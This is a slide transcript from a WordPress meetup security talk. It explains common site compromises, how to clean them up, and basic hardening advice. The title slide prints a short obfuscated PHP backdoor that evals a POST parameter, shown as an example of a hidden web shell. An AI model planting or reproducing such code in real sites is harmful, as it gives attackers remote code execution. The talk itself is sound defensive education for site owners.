security presentation for boulder wordpress meetup
TRANSCRIPT
YOUR SITE IS AND IS NOT
HACKED @ASKWPGIRL
SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not hacked until you open the box and find out.
<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>
WordPress Instructor and Custom Theme Developer
Using WordPress Since 2007 — Version 2.2
Not a security expert, but I play one on WordPress.tv
Angela Bowman
Ask WP Girl @askwpgirl
WHAAA?
1
WHY DO HACKERS HACK?Deface sites for fun
Add spammy links to bad web neighborhoods (SEO spam)
Hijack site to add spam, porn, gambling, pay-day loans content
Steal sensitive information to sell
Distribute malware to personal computers
Use server resources for distributed attacks
WHAT DO HACKERS ACTUALLY DO?
Create new accounts with admin privileges
Reset passwords of multiple accounts
Inject malicious code into content
Add malicious code to existing files or new files
Redirect your website by editing .htaccess file
http://www.wpmayor.com/wordpress-security-based-facts-statistics/
WHY SHOULD YOU CARE?Your site can start running really slow
Your SEO could take a nose dive
Your site could be blacklisted or taken down by your web host
Your site could be added to the Phish Tank which is hard to get out of
You could be sued by customers for damages
Your site can become unusable
TYPICALLY, ONLY THE MOST SEVERELY HACKED
SITES WILL BE BLACKLISTED OR
SUSPENDED BY HOST Many hacks are hidden
WHY ARE WORDPRESS SITES VULNERABLE?
PHP and MySQL inherently vulnerable - easy to write hackable code that works!
Current WordPress version very secure
Themes and plugins not all created equal
Hosting security varies
Login credentials can be compromised
Personal computer may be infected
HACK STATS
29%
8%
22%
41%41% Hosting
22% Plugins
29% Themes
8% Weak Passwords
RECENT VULNERABILITIES
Google Analytics WordPress 4.2.1
Backup to Dropbox FancyBox
TwentyFifteen
Revolution SliderGravity Forms
JetPack
Database of all vulnerable plugins and themes: https://wpvulndb.com/
RECENT STATS
100,000+ WordPress Sites Compromised through Slider Revolution
Security Vulnerability
800,000 banking credentials stolen using hacked WordPress sites
600,000 WordPress Websites Compromised through Fancybox Plugin
Security Vulnerability
http://www.databreachtoday.com/hackers-grab-800000-banking-credentials-a-7416
http://wptavern.com/hackers-hijack-fancybox-plugin-to-deface-wordpress-sites-with-isis-propaganda
LOW HANGING FRUIT
Vulnerabilities immediately published on the web
Hackers write bots to exploit vulnerabilities
Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting
COMMON EXPLOITS AND
HOW TO FIX
2
1 - Backdoors PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.
IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE
SITE CODE AND IT'S IMPOSSIBLE TO DETECT
THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
Removing Backdoors
Check WordPress core integrity using Sucuri plugin https://wordpress.org/plugins/sucuri-scanner/
Delete and reinstall WordPress core files, plugins, and themes
Check wp-content and uploads folder carefully for hacked PHP files
Run https://wordpress.org/plugins/gotmls/ to check for hacked filesin the wp-content folder
Gravity Forms hack
which of these files is
not like the others?
DIY HACK RECOVERYVia SFTP (preferred) or FTP
1 Backup:
Download everything. Good to
examine later for details of hack if
needed.
2 Delete all except:
cgi-bin.htaccess
wp-config.php(examine these)
3 Upload fresh:
WordPressThemesPlugins
cleaned uploads
Hmmmm? PHP in a CSS folder?
Look for modified dates
Look for unusual names
Compare file list to original download
Look for file types that don’t belong
Check commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php
Any file can be hacked!
2 - Drive by Downloads Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers. Easy for scanners to detect.
Cleaning up Drive by Downloads
Use Sucuri Sitecheck to scan site; read about hack
Disable javascript before hitting your site – don’t want to end up infecting your own computer while checking your site.
Remove hacked code from content or files.
Commonly hacked core files: index.php and wp_blog_header.php
Commonly hacked theme files: index.php, functions.php, header.php, footer.php
Monitor site
3 - Pharma Hack Spam links injected onto web pages only visible to search engines. Difficult to scan for because cloaked.
Cleaning up Pharma Hack
Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to scan site using different devices to find hack
Search site with Google
Same clean up as Drive by Downloads
Can be cross-infectedfrom other sites on server/hosting account
Read this: https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
site:yoursitename.com
4 - Malicious Redirects Redirects traffic from your website to another typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone
Hacked .htaccess file
Finding and Removing Malicious Redirects
Listen to when someone tells you that they tried to visit your site and couldn’t and find out which browser or device they were using at the time.
Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to verify
Scan with Sucuri’s SiteCheck
Check all the .htaccess files on the server and remove the redirect.
https://sitecheck.sucuri.net/
Why are people from Thailand and Romania accessing a strangely named PHP file somewhere?
Check raw access logs via cPanel
db12.php, css.php, dirs35.php????
MONITORING TIPS
Use Google Search Console!
Google Webmaster Tools/Search Console Search Queries – you can spot queries irrelevant to you site.Links to Your Site – you can find suspicious incoming links here.Internal Links – this report can help reveal rogue sections of your site.
http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
Audit Activity on Site
https://wordpress.org/plugins/wp-simple-firewall/
IMMEDIATELY CHANGE PASSWORDS
Use Sucuri plugin to Generate New Security Keys
Reset all passwords, including WordPress users, FTP, web hosting, control panel
Scan computer for viruses!
See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK If hackers got admin access to site or database,
you might have to nuke the entire site from orbit — it’s the only way to be sure
https://www.youtube.com/watch?v=aCbfMkh940Q
Or contact sucuri.net for
site clean up and monitoring
REQUEST SITE REVIEWIf Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are
certain you’ve cleaned up all hacked files:
https://support.google.com/webmasters/answer/168328?hl=en
SECURITY BASICS
3
UPDATE UPDATE UPDATE
Timely updates are critical for security. Tools: iControlWP, InfiniteWP, Jetpack, ManageWP,
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
UPDATING PREMIUM THEMES AND PLUGINS
Often a manual process - Download and FTP new filesBundled plugins are not supported or auto updated
Enter license key/purchase code in settings to receive updates
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
SECURE YOUR LOGINOnline Generator:
http://www.pctools.com/guides/password/
Track Passwords: http://agilebits.com/products/1Password
Enable Two-Factor Authentication:http://askwpgirl.com/wordpress-two-factor-
authentication-plugins/
RUN A TIGHT SHIP!Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow users to register (Settings > General)
Always hold comments for moderation and use spam filtering (Akismet plugin)
GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Performance Optimization
Managed WordPress Hosts:Site GroundWP Engine
Get FlywheelWeb Synthesis
Pantheon
EFFECTIVE SECURITY PLUGIN FEATURES
Limit login access
Block bad URL requests with a Firewall
Audit activity
Security through obscurity is not security
IP addresses don’t matter and should not be used as the foundation of a WordPress security policy
My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/Does all the above and more. Will notify you of vulnerable plugins.
BACKUPSCommon wisdom is to backup your site
Backups are to your site what major medical health care coverage is to your health
Usually only helpful in case of a disaster
Services:VaultPress and
WorpDrive good hosted solutions!
Plugins:BackupBuddy (paid),
BackWPUp,Duplicator
SECURE YOUR COMPUTER
Scan for viruses and trojans
Be careful about downloading stuff!!!!
RESOURCEShttp://snipe.net/2010/01/when-wordpress-gets-hacked/
https://support.google.com/webmasters/answer/163633?rd=1 ***
http://aw-snap.info/articles/find-backdoor.php
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://sucuri.net - free scan, hack recovering, site monitoring, great posts on how to clean up specific hacks
http://aswkpgirl.com/nuke-it-from-orbit
https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-login-protection-feature/
https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-misinformation-virus/
About the banking hack: https://www.proofpoint.com/es/node/327
Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc
http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
CONTACT
facebook.com/askwpgirl
twitter.com/askwpgirl
http://askwpgirl.com
http://boulderdigitalarts.com
One-on-One consulting third Friday of every month at Boulder Digital Arts
Six-week theme customization course in Colorado and online.
SEO and Best Maintenance Tips Newsletter http://askwpgirl.com